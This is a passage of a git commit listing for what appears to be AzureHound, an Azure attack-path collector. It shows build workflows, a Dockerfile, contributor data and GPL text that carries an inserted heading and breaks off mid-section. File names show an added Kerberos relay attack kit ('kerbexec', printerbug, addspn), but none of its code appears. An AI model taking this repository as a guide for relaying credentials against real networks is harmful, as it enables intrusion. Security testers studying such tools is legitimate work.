enums/share_permissions.go create mode 100644 enums/signinaudience.go create mode 100644 enums/signintype.go create mode 100644 enums/site_availability_state.go create mode 100644 enums/site_load_balancing.go create mode 100644 enums/sku_converstion_status.go create mode 100644 enums/sku_name.go create mode 100644 enums/spendinglimit.go create mode 100644 enums/ssl_state.go create mode 100644 enums/ssomode.go create mode 100644 enums/statuslevel.go create mode 100644 enums/storage_account_access_tier.go create mode 100644 enums/storage_account_provisioning_state.go create mode 100644 enums/storage_account_status.go create mode 100644 enums/storage_container_public_access.go create mode 100644 enums/storagetype.go create mode 100644 enums/subscriptionstate.go create mode 100644 enums/tenantcategory.go create mode 100644 enums/trusttype.go create mode 100644 enums/usage_state.go create mode 100644 enums/vaultprovisioningstate.go create mode 100644 enums/vaultsku.go create mode 100644 enums/vmdeleteoption.go create mode 100644 enums/vmevictionpolicy.go create mode 100644 enums/vmpriority.go create mode 100644 go.mod create mode 100644 go.sum create mode 100644 internal/utils.go create mode 100644 kerbexec/__init__.py create mode 100644 kerbexec/clients/__init__.py create mode 100644 kerbexec/clients/httprelayclient.py create mode 100644 kerbexec/clients/ldaprelayclient.py create mode 100644 kerbexec/clients/smbrelayclient.py create mode 100644 kerbexec/exp/addspn.py create mode 100644 kerbexec/exp/dns.py create mode 100644 kerbexec/exp/printerbug.py create mode 100644 kerbexec/krb.gitignore create mode 100644 kerbexec/servers/__init__.py create mode 100644 kerbexec/servers/dnsrelayserver.py create mode 100644 kerbexec/servers/httprelayserver.py create mode 100644 kerbexec/servers/smbrelayserver.py create mode 100644 kerbexec/utils/__init__.py create mode 100644 kerbexec/utils/config.py create mode 100644 kerbexec/utils/kerberos.py create mode 100644 kerbexec/utils/krbcredccache.py create mode 100644 kerbexec/utils/spnego.py create mode 100644 logger/eventlog-transport_windows.go create mode 100644 logger/internal/logger.go create mode 100644 logger/internal/logger_test.go create mode 100644 logger/log.go create mode 100644 logger/log_windows.go create mode 100644 logger/utils.go create mode 100644 main.go create mode 100644 main_windows.go create mode 100644 models/app-member.go create mode 100644 models/app-owner.go create mode 100644 models/app-role-assignments.go create mode 100644 models/app.go create mode 100644 models/automation-account.go create mode 100644 models/azure-role-assignment.go create mode 100644 models/azure/access_policy_entry.go create mode 100644 models/azure/addin.go create mode 100644 models/azure/additional_capabilities.go create mode 100644 models/azure/additional_unattend_content.go create mode 100644 models/azure/alt_security_id.go create mode 100644 models/azure/api_application.go create mode 100644 models/azure/app_profile.go create mode 100644 models/azure/app_role.go create mode 100644 models/azure/app_role_assignment.go create mode 100644 models/azure/app_scope.go create mode 100644 models/azure/application.go create mode 100644 models/azure/assigned_label.go create mode 100644 models/azure/assigned_license.go create mode 100644 models/azure/assigned_plan.go create mode 100644 models/azure/auto_heal_rules.go create mode 100644 models/azure/automatic_replies_setting.go create mode 100644 models/azure/automation_account.go create mode 100644 models/azure/automation_account_properties.go create mode 100644 models/azure/automation_account_system_data.go create mode 100644 models/azure/available_patch_summary.go create mode 100644 models/azure/azure_files_identity_based_authentication.go create mode 100644 models/azure/azure_storage_info_value.go create mode 100644 models/azure/billing_profile.go create mode 100644 models/azure/blob_restore_status.go create mode 100644 models/azure/boot_diagnostics.go create mode 100644 models/azure/boot_diagnostics_instance_view.go create mode 100644 models/azure/capacity_reservation_profile.go create mode 100644 models/azure/cloning_info.go create mode 100644 models/azure/common.go create mode 100644 models/azure/connection_item_properties.go create mode 100644 models/azure/connection_string_info.go create mode 100644 models/azure/container_registry.go create mode 100644 models/azure/data_disk.go create mode 100644 models/azure/datetime_timezone.go create mode 100644 models/azure/descendant-info.go create mode 100644 models/azure/device.go create mode 100644 models/azure/diagnostics_profile.go create mode 100644 models/azure/diff_disk_settings.go create mode 100644 models/azure/directory_object.go create mode 100644 models/azure/disk_encryption_set_params.go create mode 100644 models/azure/disk_encryption_settings.go create mode 100644 models/azure/disk_instance_view.go create mode 100644 models/azure/employee_org_data.go create mode 100644 models/azure/encryption_properties.go create mode 100644 models/azure/entity.go create mode 100644 models/azure/extended_location.go create mode 100644 models/azure/function_app.go create mode 100644 models/azure/function_app_props.go create mode 100644 models/azure/geo_replication_stats.go create mode 100644 models/azure/group.go create mode 100644 models/azure/hardware_profile.go create mode 100644 models/azure/hosting_environment_profile.go create mode 100644 models/azure/hostname_ssl_state.go create mode 100644 models/azure/image_reference.go create mode 100644 models/azure/immutability_policy.go create mode 100644 models/azure/immutability_policy_properties.go create mode 100644 models/azure/immutable_policy_update_history.go create mode 100644 models/azure/immutable_storage_account.go create mode 100644 models/azure/immutable_storage_with_versioning.go create mode 100644 models/azure/implicit_grant_settings.go create mode 100644 models/azure/informational_url.go create mode 100644 models/azure/instance_view_status.go create mode 100644 models/azure/ip_rule.go create mode 100644 models/azure/ip_security_restriction.go create mode 100644 models/azure/key_credential.go create mode 100644 models/azure/key_value.go create mode 100644 models/azure/key_vault.go create mode 100644 models/azure/key_vault_key_ref.go create mode 100644 models/azure/key_vault_secret_ref.go create mode 100644 models/azure/keyvault_permissions.go create mode 100644 models/azure/last_patch_installation_summary.go create mode 100644 models/azure/license_assignment_state.go create mode 100644 models/azure/linux_config.go create mode 100644 models/azure/linux_patch_settings.go create mode 100644 models/azure/locale_info.go create mode 100644 models/azure/logic_app.go create mode 100644 models/azure/logic_app_definition.go create mode 100644 models/azure/logic_app_parameter.go create mode 100644 models/azure/logic_app_properties.go create mode 100644 models/azure/logic_app_sku.go create mode 100644 models/azure/mailbox_settings.go create mode 100644 models/azure/maintenance_redeploy_status.go create mode 100644 models/azure/managed_by_tenant.go create mode 100644 models/azure/managed_cluster.go create mode 100644 models/azure/managed_cluster_properties.go create mode 100644 models/azure/managed_disk_params.go create mode 100644 models/azure/managed_identity.go create mode 100644 models/azure/management_group.go create mode 100644 models/azure/management_group_child_info.go create mode 100644 models/azure/management_group_details.go create mode 100644 models/azure/management_group_path_elem.go create mode 100644 models/azure/management_group_props.go create mode 100644 models/azure/name_value_pair.go create mode 100644 models/azure/network_interface_ref.go create mode 100644 models/azure/network_interface_reference_props.go create mode 100644 models/azure/network_profile.go create mode 100644 models/azure/network_rule_set.go create mode 100644 models/azure/object_identity.go create mode 100644 models/azure/onprem_ext_attributes.go create mode 100644 models/azure/onprem_provisioning_error.go create mode 100644 models/azure/optional_claims.go create mode 100644 models/azure/organization.go create mode 100644 models/azure/os_disk.go create mode 100644 models/azure/os_profile.go create mode 100644 models/azure/parent_group_info.go create mode 100644 models/azure/parental_controls_settings.go create mode 100644 models/azure/password_credential.go create mode 100644 models/azure/password_profile.go create mode 100644 models/azure/permission_scope.go create mode 100644 models/azure/plan.go create mode 100644 models/azure/preauthorized_application.go create mode 100644 models/azure/privacy_profile.go create mode 100644 models/azure/private_endpoint.go create mode 100644 models/azure/private_endpoint_connection.go create mode 100644 models/azure/private_endpoint_connection_item.go create mode 100644 models/azure/private_endpoint_connection_properties.go create mode 100644 models/azure/private_endpoint_connection_resource.go create mode 100644 models/azure/private_link_service_connection_state.go create mode 100644 models/azure/provisioned_plan.go create mode 100644 models/azure/public_client_application.go create mode 100644 models/azure/push_settings.go create mode 100644 models/azure/required_resource_access.go create mode 100644 models/azure/resource_group.go create mode 100644 models/azure/resource_group_props.go create mode 100644 models/azure/resource_reference.go create mode 100644 models/azure/role.go create mode 100644 models/azure/role_assignment.go create mode 100644 models/azure/role_permission.go create mode 100644 models/azure/routing_preference.go create mode 100644 models/azure/saml_sso_settings.go create mode 100644 models/azure/sas_policy.go create mode 100644 models/azure/scheduled_events_profile.go create mode 100644 models/azure/security_profile.go create mode 100644 models/azure/service_principal.go create mode 100644 models/azure/site_config.go create mode 100644 models/azure/site_machine_key.go create mode 100644 models/azure/sku.go create mode 100644 models/azure/slot_swap_status.go create mode 100644 models/azure/spa_application.go create mode 100644 models/azure/ssh_config.go create mode 100644 models/azure/ssh_public_key.go create mode 100644 models/azure/storage_account.go create mode 100644 models/azure/storage_account_primary_endpoints.go create mode 100644 models/azure/storage_account_props.go create mode 100644 models/azure/storage_account_sku_conversion_status.go create mode 100644 models/azure/storage_container.go create mode 100644 models/azure/storage_container_legal_hold.go create mode 100644 models/azure/storage_container_props.go create mode 100644 models/azure/storage_profile.go create mode 100644 models/azure/sub_resource.go create mode 100644 models/azure/subscription.go create mode 100644 models/azure/subscription_policies.go create mode 100644 models/azure/tenant.go create mode 100644 models/azure/terminate_notification_profile.go create mode 100644 models/azure/timezone_base.go create mode 100644 models/azure/uefi_settings.go create mode 100644 models/azure/unified_role_assignment.go create mode 100644 models/azure/unified_role_definition.go create mode 100644 models/azure/unified_role_permission.go create mode 100644 models/azure/user.go create mode 100644 models/azure/user_assigned_identity.go create mode 100644 models/azure/vault_certificate.go create mode 100644 models/azure/vault_props.go create mode 100644 models/azure/vault_secret_group.go create mode 100644 models/azure/verified_domain.go create mode 100644 models/azure/verified_publisher.go create mode 100644 models/azure/virtual_application.go create mode 100644 models/azure/virtual_hard_disk.go create mode 100644 models/azure/virtual_machine.go create mode 100644 models/azure/virtual_machine_agent_instance_view.go create mode 100644 models/azure/virtual_machine_extension.go create mode 100644 models/azure/virtual_machine_extension_handler_instance_view.go create mode 100644 models/azure/virtual_machine_extension_instance_view.go create mode 100644 models/azure/virtual_machine_health_status.go create mode 100644 models/azure/virtual_machine_instance_view.go create mode 100644 models/azure/virtual_machine_network_interface_config.go create mode 100644 models/azure/virtual_machine_patch_status.go create mode 100644 models/azure/virtual_machine_props.go create mode 100644 models/azure/virtual_network_rule.go create mode 100644 models/azure/vm_extension_props.go create mode 100644 models/azure/vm_gallery_app.go create mode 100644 models/azure/vm_ip_config_props.go create mode 100644 models/azure/vm_ip_tag.go create mode 100644 models/azure/vm_network_interface_config_props.go create mode 100644 models/azure/vm_network_interface_dns_settings.go create mode 100644 models/azure/vm_network_interface_ip_config.go create mode 100644 models/azure/vm_public_ip_config.go create mode 100644 models/azure/vm_public_ip_config_props.go create mode 100644 models/azure/vm_public_ip_dns_settings.go create mode 100644 models/azure/vm_public_ip_sku.go create mode 100644 models/azure/vm_scale_set.go create mode 100644 models/azure/vm_size_props.go create mode 100644 models/azure/web_app.go create mode 100644 models/azure/web_application.go create mode 100644 models/azure/win_rm_config.go create mode 100644 models/azure/win_rm_listener.go create mode 100644 models/azure/windows_config.go create mode 100644 models/azure/windows_patch_settings.go create mode 100644 models/azure/working_hours.go create mode 100644 models/container-registry.go create mode 100644 models/device-owner.go create mode 100644 models/device.go create mode 100644 models/function-app.go create mode 100644 models/group-member.go create mode 100644 models/group-owner.go create mode 100644 models/group.go create mode 100644 models/ingest-request.go create mode 100644 models/job.go create mode 100644 models/key-vault-access-policy.go create mode 100644 models/key-vault-contributor.go create mode 100644 models/key-vault-kvcontributor.go create mode 100644 models/key-vault-owner.go create mode 100644 models/key-vault-role-assignment.go create mode 100644 models/key-vault-user-access-admin.go create mode 100644 models/key-vault.go create mode 100644 models/logic-app.go create mode 100644 models/managed-cluster.go create mode 100644 models/management-group-owner.go create mode 100644 models/management-group-role-assignment.go create mode 100644 models/management-group-user-access-admin.go create mode 100644 models/mgmt-group.go create mode 100644 models/resource-group-owner.go create mode 100644 models/resource-group-role-assignment.go create mode 100644 models/resource-group-user-access-admin.go create mode 100644 models/resource-group.go create mode 100644 models/role-assignments.go create mode 100644 models/role.go create mode 100644 models/service-principal-owner.go create mode 100644 models/service-principal.go create mode 100644 models/storage-account.go create mode 100644 models/storage-container.go create mode 100644 models/subscription-owner.go create mode 100644 models/subscription-role-assignment.go create mode 100644 models/subscription-user-access-admin.go create mode 100644 models/subscription.go create mode 100644 models/task.go create mode 100644 models/tenant.go create mode 100644 models/update-client-request.go create mode 100644 models/user.go create mode 100644 models/utils.go create mode 100644 models/utils_test.go create mode 100644 models/virtual-machine-admin-login.go create mode 100644 models/virtual-machine-avere-contributor.go create mode 100644 models/virtual-machine-contributor.go create mode 100644 models/virtual-machine-owner.go create mode 100644 models/virtual-machine-role-assignment.go create mode 100644 models/virtual-machine-user-access-admin.go create mode 100644 models/virtual-machine-vmcontributor.go create mode 100644 models/virtual-machine.go create mode 100644 models/vm-scale-set.go create mode 100644 models/web-app.go create mode 100644 panicrecovery/panic_recovery.go create mode 100644 pipeline/pipeline.go create mode 100644 pipeline/pipeline_test.go create mode 100644 sec.gitignore create mode 100644 sinks/console.go create mode 100644 sinks/file.go delete mode 100644 test/1.jpg delete mode 100644 test/2.jpg delete mode 100644 test/3.jpeg delete mode 100644 test/4.jpg delete mode 100644 test/5.jpg delete mode 100644 test/6.jpg delete mode 100644 test/SlidesIndex.html delete mode 100644 test/styles.css diff --git a/.all-contributorsrc b/.all-contributorsrc new file mode 100644 index 0000000..fd96b1e --- /dev/null +++ b/.all-contributorsrc @@ -0,0 +1,97 @@ +{ + "projectName": "AzureHound", + "projectOwner": "BloodHoundAD", + "repoType": "github", + "repoHost": "https://github.com", + "files": [ + "CONTRIBUTORS.md" + ], + "imageSize": 100, + "commit": true, + "commitConvention": "none", + "contributors": [ + { + "login": "andyrobbins", + "name": "Andy Robbins", + "avatar_url": "https://avatars.githubusercontent.com/u/842644?v=4", + "profile": "https://www.twitter.com/_wald0", + "contributions": [ + "ideas", + "design", + "blog", + "content", + "doc" + ] + }, + { + "login": "ddlees", + "name": "Dillon Lees", + "avatar_url": "https://avatars.githubusercontent.com/u/8984872?v=4", + "profile": "https://github.com/ddlees", + "contributions": [ + "code", + "maintenance", + "ideas", + "design" + ] + }, + { + "login": "rvazarkar", + "name": "Rohan Vazarkar", + "avatar_url": "https://avatars.githubusercontent.com/u/5720446?v=4", + "profile": "https://blog.cptjesus.com/", + "contributions": [ + "code", + "maintenance" + ] + }, + { + "login": "urangel", + "name": "Ulises Rangel", + "avatar_url": "https://avatars.githubusercontent.com/u/16910931?v=4", + "profile": "https://ulises.io/", + "contributions": [ + "code", + "maintenance" + ] + }, + { + "login": "joshgantt", + "name": "joshgantt", + "avatar_url": "https://avatars.githubusercontent.com/u/29784250?v=4", + "profile": "https://github.com/joshgantt", + "contributions": [ + "code", + "maintenance" + ] + }, + { + "login": "hugo-syn", + "name": "hugo-syn", + "avatar_url": "https://avatars.githubusercontent.com/u/61210734?v=4", + "profile": "https://github.com/hugo-syn", + "contributions": [ + "code" + ] + }, + { + "login": "crimike", + "name": "crimike", + "avatar_url": "https://avatars.githubusercontent.com/u/10261812?v=4", + "profile": "https://github.com/crimike", + "contributions": [ + "code" + ] + }, + { + "login": "0xffhh", + "name": "0xffhh", + "avatar_url": "https://avatars.githubusercontent.com/u/56194755?v=4", + "profile": "https://github.com/0xffhh", + "contributions": [ + "code" + ] + } + ], + "contributorsPerLine": 7 +} diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 0000000..aa10ef9 --- /dev/null +++ b/.dockerignore @@ -0,0 +1,2 @@ +logs +*.log diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 0000000..f6342c0 --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,112 @@ +name: Build + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + +jobs: + test: + runs-on: ubuntu-latest + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v3 + + - name: Setup Go + uses: actions/setup-go@v3 + with: + go-version-file: go.mod + check-latest: true + cache: true + + - name: Test + run: go test ./... + + containerize: + runs-on: ubuntu-latest + permissions: + packages: write + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v3 + + - name: Log in to the Container registry + uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Extract metadata + id: meta + uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 + with: + images: ghcr.io/bloodhoundad/azurehound + tags: | + type=edge,branch=main + + - name: Build Container Image + uses: docker/build-push-action@v3 + with: + context: . + build-args: VERSION=v0.0.0-rolling+${{ github.sha }} + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }} + push: ${{ ! startsWith(github.event_name, 'pull_request') }} + + build: + runs-on: ubuntu-latest + defaults: + run: + shell: bash + strategy: + matrix: + os: + - darwin + - linux + - windows + arch: + - amd64 + - arm64 + steps: + - uses: actions/checkout@v3 + + - name: Setup Go + uses: actions/setup-go@v3 + with: + go-version-file: go.mod + check-latest: true + cache: true + + - name: Build + run: 'go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/v2/constants.Version=v0.0.0-rolling+${{ github.sha }}"' + env: + GOOS: ${{ matrix.os }} + GOARCH: ${{ matrix.arch }} + + - name: Zip + if: "! startsWith(github.event_name, 'pull_request')" + run: 7z a -tzip -mx9 azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip azurehound* + + - name: Compute Checksum + if: "! startsWith(github.event_name, 'pull_request')" + run: sha256sum azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip > azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256 + + - name: Update Rolling Release + if: "! startsWith(github.event_name, 'pull_request')" + uses: softprops/action-gh-release@v1 + with: + name: Rolling Release (unstable) + tag_name: rolling + prerelease: true + files: | + azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip + azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256 + body: | + Rolling release of AzureHound compiled from source (${{ github.sha }}) + This is automatically kept up-to-date with the `${{ github.ref_name }}` ${{ github.ref_type }} diff --git a/.github/workflows/cla.yml b/.github/workflows/cla.yml new file mode 100644 index 0000000..c2c8b0c --- /dev/null +++ b/.github/workflows/cla.yml @@ -0,0 +1,24 @@ +name: "CLA Assistant" +on: + issue_comment: + types: [created] + pull_request_target: + types: [opened, closed, synchronize] + +jobs: + CLAssistant: + runs-on: ubuntu-latest + steps: + - name: "CLA Assistant" + if: (github.event.comment.body == 'recheck' || github.event.comment.body == 'I have read the CLA Document and I hereby sign the CLA') || github.event_name == 'pull_request_target' + uses: contributor-assistant/github-action@v2.3.1 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PERSONAL_ACCESS_TOKEN: ${{ secrets.REPO_SCOPE }} + with: + path-to-signatures: "signatures.json" + path-to-document: "https://github.com/BloodHoundAD/CLA/blob/main/ICLA.md" + branch: "main" + remote-organization-name: BloodHoundAD + remote-repository-name: CLA + allowlist: dependabot[bot] diff --git a/.github/workflows/jekyll-docker.yml b/.github/workflows/jekyll-docker.yml deleted file mode 100644 index ee24716..0000000 --- a/.github/workflows/jekyll-docker.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: assets - -on: - push: - branches: [ "main" ] - pull_request: - branches: [ "main" ] - -jobs: - build: - - runs-on: ubuntu-latest - - steps: - - uses: actions/checkout@v3 - - name: Learning subscriber - run: | - docker run \ - -v ${{ github.workspace }}:/srv/jekyll -v ${{ github.workspace }}/_site:/srv/jekyll/_site \ - jekyll/builder:latest /bin/bash -c "chmod -R 777 /srv/jekyll && jekyll build --future" diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml new file mode 100644 index 0000000..da302ac --- /dev/null +++ b/.github/workflows/publish.yml @@ -0,0 +1,85 @@ +name: Publish + +on: + push: + tags: + - "v*.*.*" + +jobs: + build: + runs-on: ubuntu-latest + defaults: + run: + shell: bash + strategy: + matrix: + os: + - darwin + - linux + - windows + arch: + - amd64 + - arm64 + steps: + - uses: actions/checkout@v3 + + - name: Setup Go + uses: actions/setup-go@v3 + with: + go-version-file: go.mod + check-latest: true + cache: true + + - name: Build + run: 'go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/v2/constants.Version=${{ github.ref_name }}"' + env: + GOOS: ${{ matrix.os }} + GOARCH: ${{ matrix.arch }} + + - name: Zip + run: 7z a -tzip -mx9 azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip azurehound* + + - name: Compute Checksum + run: sha256sum azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip > azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256 + + - name: Upload Release + uses: softprops/action-gh-release@v1 + with: + files: | + azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip + azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256 + + containerize: + runs-on: ubuntu-latest + permissions: + packages: write + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v3 + + - name: Log in to the Container registry + uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Extract metadata + id: meta + uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 + with: + images: ghcr.io/bloodhoundad/azurehound + tags: | + type=semver,pattern={{version}},prefix=v + type=semver,pattern={{major}}.{{minor}},prefix=v + + - name: Build Container Image + uses: docker/build-push-action@v3 + with: + context: . + build-args: VERSION=${{ github.ref_name }} + tags: ${{ steps.meta.outputs.tags }} + labels: ${{ steps.meta.outputs.labels }} + push: true diff --git a/.idea/.gitignore b/.idea/.gitignore new file mode 100644 index 0000000..13566b8 --- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Editor-based HTTP Client requests +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/.idea/AzureHound.iml b/.idea/AzureHound.iml new file mode 100644 index 0000000..5e764c4 --- /dev/null +++ b/.idea/AzureHound.iml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/.idea/modules.xml b/.idea/modules.xml new file mode 100644 index 0000000..9dc1ccb --- /dev/null +++ b/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/.licenserc.yaml b/.licenserc.yaml new file mode 100644 index 0000000..378038d --- /dev/null +++ b/.licenserc.yaml @@ -0,0 +1,18 @@ +header: + license: + spdx-id: GPL-3.0-or-later + copyright-owner: Specter Ops, Inc. + software-name: AzureHound + paths: + - 'main.go' + paths-ignore: + - .git + - dist + - licenses + - '**/*.md' + + comment: on-failure + + dependency: + files: + - go.mod diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md new file mode 100644 index 0000000..85f5a30 --- /dev/null +++ b/CONTRIBUTORS.md @@ -0,0 +1,32 @@ + + +[![All Contributors](https://img.shields.io/badge/all_contributors-8-orange.svg?style=flat-square)](#contributors-) + +## Contributors ✨ + +Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): + + + + + + + + + + + + + + + + + +

Andy Robbins
🤔 🎨 📝 🖋 📖
Dillon Lees
💻 🚧 🤔 🎨
Rohan Vazarkar
💻 🚧
Ulises Rangel
💻 🚧
joshgantt
💻 🚧
hugo-syn
💻
crimike
💻

0xffhh
💻
+ + + + + + +This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome! diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..0824ddc --- /dev/null +++ b/Dockerfile @@ -0,0 +1,16 @@ +# syntax=docker/dockerfile:1 + +FROM golang:1.20 as build +WORKDIR /app + +ARG VERSION=v0.0.0 +ENV CGO_ENABLED=1 + +COPY ./ ./ +RUN go mod download +RUN go build -ldflags="-s -w -X github.com/BloodHoundAD/AzureHound/v2/constants.Version=$VERSION+docker" + +FROM gcr.io/distroless/base-debian12:nonroot +LABEL org.opencontainers.image.source https://github.com/BloodHoundAD/AzureHound +COPY --from=build /app/azurehound / +ENTRYPOINT ["/azurehound"] diff --git a/LICENSE b/LICENSE-SEC similarity index 100% rename from LICENSE rename to LICENSE-SEC diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 0000000..fe9d499 --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,676 @@ +GNU GENERAL PUBLIC LICENSE + +Version 3, 29 June 2007 + +Copyright 2007 Free Software Foundation, Inc. [fsf](http://fsf.org/) +Everyone is permitted to copy and distribute verbatim copies +of this license document, but changing it is not allowed. + +# AzureHoundAD / `Main` + +The GNU General Public License is a free, copyleft license for +software and other kinds of works. + +The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + +To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + +For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + +Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + +For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + +Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + +Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + +The precise terms and conditions for copying, distribution and +modification follow. + +TERMS AND CONDITIONS + +0. Definitions. + +"This License" refers to version 3 of the GNU General Public License. + +"Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + +"The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + +To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + +A "covered work" means either the unmodified Program or a work based +on the Program. + +To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + +To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + +An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + +1. Source Code. + +The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + +A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + +The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + +The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + +The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + +The Corresponding Source for a work in source code form is that +same work. + +2. Basic Permissions. + +All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + +You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + +Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + +3. Protecting Users' Legal Rights From Anti-Circumvention Law. + +No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + +When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + +4. Conveying Verbatim Copies. + +You may convey 